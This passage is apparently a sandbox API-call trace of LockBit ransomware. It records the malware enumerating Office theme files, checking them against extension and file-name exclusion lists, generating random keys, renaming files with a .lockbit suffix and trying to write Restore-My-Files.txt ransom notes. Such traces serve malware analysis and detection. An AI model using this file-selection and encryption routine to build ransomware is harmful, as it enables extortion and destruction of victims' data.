(lpString1=".idx", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Paper.thmx") returned 1 [0190.369] lstrcmpiW (lpString1="ntldr", lpString2="Paper.thmx") returned -1 [0190.369] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Paper.thmx") returned -1 [0190.369] lstrcmpiW (lpString1="bootsect.bak", lpString2="Paper.thmx") returned -1 [0190.369] lstrcmpiW (lpString1="autorun.inf", lpString2="Paper.thmx") returned -1 [0190.369] lstrcmpiW (lpString1="thumbs.db", lpString2="Paper.thmx") returned 1 [0190.369] lstrcmpiW (lpString1="iconcache.db", lpString2="Paper.thmx") returned -1 [0190.369] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.369] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx") returned=".thmx" [0190.369] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.369] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.369] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.370] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.370] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx.lockbit") returned 72 [0190.370] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\paper.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.636] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.636] malloc (_Size=0x40068) returned 0x1ff1e60 [0190.636] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=270822) returned 1 [0190.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0190.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0190.637] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.640] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.640] malloc (_Size=0xa6) returned 0x1fa2ed8 [0190.640] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0190.641] free (_Block=0x1fa2ed8) [0190.641] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.641] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.642] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51182f00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c16b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51182f00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perspective.thmx", cAlternateFileName="PERSPE~1.THM")) returned 1 [0190.642] lstrcmpiW (lpString1=".", lpString2="Perspective.thmx") returned -1 [0190.642] lstrcmpiW (lpString1="..", lpString2="Perspective.thmx") returned -1 [0190.642] PathFindExtensionW (pszPath="Perspective.thmx") returned=".thmx" [0190.642] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.642] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.643] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.643] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.644] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perspective.thmx") returned 1 [0190.644] lstrcmpiW (lpString1="ntldr", lpString2="Perspective.thmx") returned -1 [0190.644] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perspective.thmx") returned -1 [0190.644] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perspective.thmx") returned -1 [0190.644] lstrcmpiW (lpString1="autorun.inf", lpString2="Perspective.thmx") returned -1 [0190.644] lstrcmpiW (lpString1="thumbs.db", lpString2="Perspective.thmx") returned 1 [0190.644] lstrcmpiW (lpString1="iconcache.db", lpString2="Perspective.thmx") returned -1 [0190.644] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.644] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx") returned=".thmx" [0190.645] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.645] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.645] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.646] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.646] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx.lockbit") returned 78 [0190.646] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0190.648] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.648] malloc (_Size=0x40068) returned 0x3d70450 [0190.648] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=53594) returned 1 [0190.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0190.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0190.650] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0190.652] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.652] malloc (_Size=0xb2) returned 0x1fa2ed8 [0190.652] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0190.653] free (_Block=0x1fa2ed8) [0190.653] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.653] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.653] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.654] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54abb600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c3cce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x54abb600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xc97ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pushpin.thmx", cAlternateFileName="PUSHPI~1.THM")) returned 1 [0190.654] lstrcmpiW (lpString1=".", lpString2="Pushpin.thmx") returned -1 [0190.654] lstrcmpiW (lpString1="..", lpString2="Pushpin.thmx") returned -1 [0190.654] PathFindExtensionW (pszPath="Pushpin.thmx") returned=".thmx" [0190.654] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.654] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.655] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.655] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.656] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pushpin.thmx") returned 1 [0190.656] lstrcmpiW (lpString1="ntldr", lpString2="Pushpin.thmx") returned -1 [0190.656] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pushpin.thmx") returned -1 [0190.656] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pushpin.thmx") returned -1 [0190.656] lstrcmpiW (lpString1="autorun.inf", lpString2="Pushpin.thmx") returned -1 [0190.656] lstrcmpiW (lpString1="thumbs.db", lpString2="Pushpin.thmx") returned 1 [0190.657] lstrcmpiW (lpString1="iconcache.db", lpString2="Pushpin.thmx") returned -1 [0190.657] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.657] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx") returned=".thmx" [0190.657] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.657] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.657] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.658] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.658] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx.lockbit") returned 74 [0190.658] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0190.663] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.663] malloc (_Size=0x40068) returned 0x3f70048 [0190.664] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=825294) returned 1 [0190.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0190.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0190.665] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0190.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.668] malloc (_Size=0xaa) returned 0x1fa2ed8 [0190.668] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0190.669] free (_Block=0x1fa2ed8) [0190.669] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.669] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.669] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.669] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, 